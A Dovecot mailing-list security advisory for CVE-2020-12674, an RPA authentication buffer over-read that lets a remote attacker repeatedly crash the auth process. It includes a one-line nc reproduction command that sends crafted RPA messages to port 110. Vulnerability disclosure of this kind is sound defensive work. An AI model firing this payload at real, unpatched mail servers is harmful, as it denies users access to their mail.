CVE-2020-12674: Specially crafted RPA authentication message crashes auth

Aki Tuomi aki.tuomi at dovecot.fi
Wed Aug 12 16:14:49 EEST 2020


Open-Xchange Security Advisory 2020-08-12

Affected product: Dovecot IMAP server
Internal reference: DOP-1869 (Bug ID)
Vulnerability type: CWE-126 (Buffer over-read)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
Researcher credit: Orange from DEVCORE team
CVE reference: CVE-2020-12674
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
Dovecot's RPA mechanism implementation accepts zero-length message,
which leads to assert-crash later on

Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.

Steps to reproduce:
(echo 'AUTH RPA'; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01'
| base64 -w 0; echo ; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A at A\x00' |
base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110

Workaround:
Disable RPA authentication.

Solution:
Upgrade to fixed version.

Best regards,
Aki Tuomi
Open-Xchange oy

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 488 bytes
Desc: OpenPGP digital signature
URL: <https://dovecot.org/pipermail/dovecot/attachments/20200812/c77295f4/attachment.sig>


More information about the dovecot mailing list